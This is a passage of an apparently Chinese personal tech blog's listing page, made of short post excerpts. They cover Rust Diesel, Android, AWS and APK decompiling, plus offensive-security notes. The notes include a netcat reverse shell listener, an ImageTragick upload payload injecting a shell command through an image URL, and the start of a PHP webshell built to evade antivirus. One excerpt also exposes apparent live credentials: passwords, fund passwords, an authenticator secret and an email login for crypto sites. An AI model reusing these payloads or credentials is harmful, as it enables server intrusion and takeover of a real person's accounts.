sojson.v4 参考：https://www.bingdou.net/news/295.html 微信小程序的解密参考：  https://blog.csdn.net/wgpython/article/details/103587957 目前来看，js 加密的话，2个途径： 1。 字符串转移， a => \x37  , b => \x67 这样的&#1...

https://block.ve-china.com.cn/GEcoin/ dboss.in: 13522223382 aaa333AAA$$$ 资金密码 sss333sss333 谷歌 密钥：TOAV4JBK7N62B3P3 dboss.in  bjfx666888@163.com abc123ABC!@# 资金密码 abc123ABC!@#a   （多...

反弹shell , 超级强大， 英文 reverse shell （反向shell )  参考 在线生成器：https://shellgenerator.github.io 这个简直太强大了！ 1. 在本地搭建好一个 reverse shell server:   nc -nvlp 5000 这就表示，你的本地已经有5000端口在监听从外面发过来的 请求了。&...

refer to: https://quake.360.net/quake/#/index 太简单，没啥好说的，直接看图。 360 一年的会员， 每月1W条 也可以根据需要来购买, 80 / 1w条查询  也有更多档位  很人性化了

上传一个文件，内容为： push graphic-contextviewbox 0 0 640 480 image over 0,0 0,0 'https://baji.sweetysoft.com:3000/hi?x=`id > /tmp/lala`'    pop graphic-context 0x00 任意命令执行 一旦服务器端执行 convert...

漏洞字典（世界漏洞数据库）https://nvd.nist.gov/vuln 时刻关注这里，会有持续的所有漏洞更新。 这里也是CVE的，跟上面有啥区别没细看，也能下载所有的CVE   https://cve.mitre.org/ 这里这里这里！！ https://cve.mitre.org/data/downloads/index.html CVE的全部！ php&#1...

看起来相当不错。 做梦的时候梦到，所以起床赶紧弄起来。 没个靶机，学到好多内容都无法练手，跟高中做了题却不知道对错一个感觉。  所以靶机相当必要。  https://github.com/vulhub/vulhub   7k star     https://github.com/Medicean/VulApps&#160...

这个简直太强大了 一直以来我以为无法过是因为 eval 的原因， 看了很多免杀，都是使用assert php 7.1 以后就无法使用assert 了。 所以看起来还是没问题的。 估计以后 使用自行加密、解密的方式是绕过的主流 <?php class PLRN{ public $DLUG = null; public $FVRE = null; function __con...

有的话陆续加上。 360目前的列表：https://security.360.cn/News/affiche 绿盟的列表：http://www.nsfocus.net/vulndb/50297

安装 1. vmware 安装新系统时， 要使用 “安装版”iso, （也就是windows的官方安装光盘的内容），而不是ghost等内容。 2. 使用迅雷下载的时候，用手机的4G可能更快一些。 3. 下载后，需要使用winiso把对应的 镜像文件copy出来. 4. 使用大白菜U盘可以直接安装. 不过记得要把 ghost 文件copy到大白菜所在的U盘中。（可能有的U盘不认4G以上的大文件...

dex2jar: 是一个工具,直接https://sourceforge.net/projects/dex2jar/ 这里下载. 下载后解压缩,能得到一系列的命令   d2j-jar2dex.sh 这个就是咱们需要的.  把它放到PATH下,就可以直接使用.  那么问题来了,如何反编译apk:  1. 下载某个apk .  并且重命...

这篇文章很有意思: https://www.jianshu.com/p/9a052b4f0656 写了从解压到重新编译的过程. Linux:Download Linux wrapper script (Right click, Save Link As apktool)Download apktool-2 (find newest here)Rename downloaded jar to...

参考: https://www.thecrazyprogrammer.com/2015/07/5-best-java-decompilers.html 1. 下载 对应的jar 文件 ( jd-gui.jar)  2. 本地安装好 jdk  ( linux 下： apt-get install openjdk-8-jdk )  3. 运行：  jav...

参考：https://blog.csdn.net/hsd2012/article/details/51464409 在rust的持久层框架diesel中，insert操作仅支持postgres, 会返回id.  对于  mysql 与 sqlite都不支持。 所以我们需要用对应的办法。 使用 last_insert_id 是可以的。 在高并发操作下是准确的。 查询和插入...

refer to: https://github.com/tennc/webshell 太强大了。。。

diesel 是 rust世界的 持久层框架。 官方网址  diesel.rs  （域名很有意思） 截止 2020-5-18 , 5500关注， 支持的数据库是  postgres, mysql , sqlite  一 创建数据库，表，映射，并查询数据 1. cargo new --lib test_diesel 会创建一个新文件夹： test_die...

参考：https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/recognize-expanded-volume-linux.html 1. 登录后台， 找到硬盘， 为该硬盘扩容。  console -> ec2 -> volumes -> 修改即可 2. df -kh 可以看到现在的硬盘容量。 同时需要查看当前硬...

burpsuite: 一个攻击平台 wooyun drops: 应该是乌云的精华区 android 使用root机器反编译 脱壳 -> dex -> jar -> java ， 可能看到未混淆 源代码 SSRF: server side request forgery 服务器端请求伪造 xss: cross site scripting, 跨站脚本攻击 </sp...

参考:   https://developer.android.com/training/data-storage/room/migrating-db-versions 1. room 的入口文件要找到, 在我的项目如下. ( 增加 @Database 中的version, MIGRATION... 以及 db()函数中的语句)  // 这里的version...

如果遇到这个问题的话： 1。 卸载2.3  2. 安装2.2.6  3. 安装 ruby dev kit.  就可以了。 或者直接安装绑定了rubydevkit的高版本ruby， 例如ruby 2.4, 2.5, 2.6